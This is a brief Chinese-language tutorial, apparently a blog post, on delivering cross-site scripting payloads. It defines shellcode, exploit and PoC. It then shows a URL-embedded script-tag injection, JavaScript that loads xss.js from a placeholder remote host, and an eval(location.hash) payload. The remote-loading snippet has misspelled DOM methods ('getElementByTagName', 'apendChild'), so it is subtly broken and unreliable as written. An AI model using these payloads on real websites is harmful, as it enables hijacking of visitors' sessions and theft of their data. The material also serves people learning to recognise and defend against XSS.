XSS----shellcode的調用

  • shellcode、exploit、poc

  1. shellcode:最初是指溢出程序和蠕蟲病毒核心,實際上是指利用漏洞所執行的一段代碼

  2. Exploit:英文意思利用,編寫好的漏洞利用工具或程序,具有攻擊性

  3. Poc:Proof of Concept縮寫,是一段證明漏洞存在的程序代碼 

  • 動態調用遠程JavaScript(缺點是URL中容易顯露出來)

  • 格式: 

https://www.xxxxx.com/index.php?sort=[exploit]
  • 可直接把shellcode寫到URL中,如: 

https://www.xxxx.com/view.php?sort="><script>alert(/xss/)</script>
#或者賦值變量動態創建,假設機子的腳本位xss.js 如:
var s=document.createElement("script")
s.src="http://wwww.xxxx.com/xss.js";
document.getElementByTagName("head")[0].apendChild(s);

#當然這裏亦可以使用jQuery來寫是一樣,而且會更簡潔
  • 使用window.location.hash(這種方式不需要加載服務器上的腳本) ,示例:

http://www.xxxx.com/view.php?sort="><script>eval(location.hash.substr(1))</script>#alert('xss')

 

 

 

 

      

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章